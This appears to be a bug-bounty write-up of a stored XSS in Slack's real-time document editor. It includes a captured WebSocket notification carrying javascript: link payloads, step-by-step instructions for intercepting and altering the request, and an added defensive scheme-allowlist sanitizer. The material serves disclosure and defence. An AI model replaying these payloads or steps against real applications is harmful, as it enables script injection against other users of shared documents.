Slack XSS

  • Title: Stored XSS on team.slack.com using the new Markdown editor of posts inside the editing mode and using JavaScript URIs.
  • Reported by: fransrosen.
  • Bounty rewarded: $1,000.
  • Web application URL: https://slack.com.
  • Description: Slack is an online team collaboration platform that can be used to manage projects internally and externally. It is used by many organizations to collaborate on different projects. Slack provides a live document-editing feature for text documents, which can be used to edit documents in collaboration in real time. This XSS vulnerability was identified by Fransrosen in Slack's real-time document-editing feature.
  • When a document is uploaded on Slack, it is transferred to the /files/ directory. That directory path, followed by the encoded filename, was used to execute arbitrary JavaScript in editing mode. The vulnerability relies on intercepting the modifications sent over the WebSocket and triggering the XSS from there.
  • The vulnerability, however, is triggered when the malicious JavaScript is embedded as a notification behind the text in editing mode. Frans used the following URL as a test: https://marqueexss.slack.com/files/marqueexss/F0283AA4K
  • Consider the following piece of text:

This payload, shown as javascript:alert("XSS"), is the vulnerable text with a link embedded behind it. However, the JS alert cannot be executed by embedding the JS payload directly, so the payload has to be stored through the WebSocket notifications. The payload looks something like the following, which is one such notification:

{"type":"rocket","event":"rocket","payload":{"mm":[["fi",[],3,{"type":"unfurl","originalFragment":{"_bindings":{"attach":[[]],"mutation:post":[[]],"attached":[[]],"detach":[[]],"detached":[[]]},"_bindingLock":0,"_customData":[],"_data":{"type":"p","text":"JavaScript:alert(document.domain%29","tabbing":0,"links":{"JavaScript:alert(\"XSS\"%29":[0,22]},"formats":[]},"_dom":null,"_mutable":{"_lock":0},"_mutableGuard":{"_lock":0},"_parent":null,"_text":"JavaScript:alert(\"XSS\"%29","_tabbing":0,"_links":{"JavaScript:alert(\"XSS\"":{"_ranges":[{"_s":0,"_e":22}]}},"pendingUnfurls":[],"_formats":{"b":{"_ranges":[]},"i":{"_ranges":[]},"u":{"_ranges":[]},"strike":{"_ranges":[]},"code":{"_ranges":[]}}},"url":"JavaScript:alert(\"XSS\"%29"}]],"r":19,"$":15,"type":"mm","sel":[[3],0,[3],0]},"id":25}

The previous payload is a WebSocket notification sent to the web application. The link-related parameters are present in the text string, and almost all of them carry a conventional XSS alert payload, which, once the notification is sent back to the web application and rendered, produces an alert box when the user clicks the link:
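The defensive counterpart to the notification above is to treat every link target that arrives over the collaboration WebSocket as untrusted and allowlist its URL scheme before it is rendered into the document. The following is an added example, not Slack's code and not part of the original report; the message shape is a trimmed, constructed copy of the captured notification, and the base origin used to resolve relative links is a placeholder. It uses the WHATWG URL parser so that case variations ("JavaScript:"), leading spaces and embedded tabs or newlines in the scheme all still resolve to javascript: and are rejected.

```javascript
// Added example (not Slack's code): sanitize link targets carried in a
// collaborative-editing WebSocket message before they reach the DOM.
// Only http(s), mailto and relative URLs survive; javascript:, data:,
// vbscript: and unparseable targets are dropped.

const SAFE_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);

// Hypothetical placeholder origin, used only to resolve relative links.
const DOCUMENT_ORIGIN = "https://example.invalid/";

function isSafeLink(href) {
  if (typeof href !== "string") return false;
  let url;
  try {
    // The WHATWG parser strips leading/trailing C0 controls and spaces and
    // removes embedded tabs/newlines, so "Java\tScript:" and " javascript:"
    // both normalize to the javascript: scheme and fail the allowlist.
    url = new URL(href, DOCUMENT_ORIGIN);
  } catch (e) {
    return false; // unparseable target: refuse rather than guess
  }
  return SAFE_PROTOCOLS.has(url.protocol);
}

// Rebuild one fragment's link map and url field, keeping only safe targets.
// Returns the number of links removed so the caller can log or alert on it.
function sanitizeFragment(fragment) {
  let removed = 0;
  const data = fragment.originalFragment && fragment.originalFragment._data;
  if (data && data.links) {
    const clean = {};
    for (const [href, range] of Object.entries(data.links)) {
      if (isSafeLink(href)) clean[href] = range;
      else removed++;
    }
    data.links = clean;
  }
  if (fragment.url !== undefined && !isSafeLink(fragment.url)) {
    delete fragment.url;
    removed++;
  }
  return removed;
}

// Walk every "mm" operation (shape: ["fi", [], 3, {fragment}]) in a message.
function sanitizeMessage(message) {
  let removed = 0;
  const ops = (message.payload && message.payload.mm) || [];
  for (const op of ops) {
    const fragment = op[3];
    if (fragment && typeof fragment === "object") removed += sanitizeFragment(fragment);
  }
  return removed;
}

// Constructed sample, trimmed from the captured notification shape:
// one benign link plus one javascript: link in the same fragment.
const SAMPLE_MESSAGE = {
  type: "rocket",
  event: "rocket",
  payload: {
    mm: [["fi", [], 3, {
      type: "unfurl",
      originalFragment: {
        _data: {
          type: "p",
          text: "JavaScript:alert(document.domain%29",
          links: {
            "https://slack.com/": [0, 5],
            'JavaScript:alert("XSS"%29': [0, 22],
          },
        },
      },
      url: 'JavaScript:alert("XSS"%29',
    }]],
    type: "mm",
  },
  id: 25,
};

// Sanitize a deep copy so the sample stays intact for re-use.
function sanitizeSample() {
  const copy = JSON.parse(JSON.stringify(SAMPLE_MESSAGE));
  const removed = sanitizeMessage(copy);
  return { removed, message: copy };
}

if (typeof require !== "undefined" && require.main === module) {
  const result = sanitizeSample();
  console.log(`removed ${result.removed} unsafe link(s)`);
  console.log(JSON.stringify(result.message.payload.mm[0][3], null, 2));
}
```

The allowlist is deliberately on the scheme rather than a denylist of "javascript", because the page's own payload shows the scheme arriving in mixed case and with percent-encoded characters, and a string match is easy to bypass with whitespace or control characters that the URL parser quietly removes.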

Since more than one team member can edit the same document, many users can be affected by this vulnerability. Frans carried out the following steps to trigger it:

  1. Delete the link behind the text that was embedded
  2. Press Ctrl + Z to undo it
  3. Put back the link
  4. Capture that request
  5. Modify the request to insert the payload inside the links part of the WebSocket request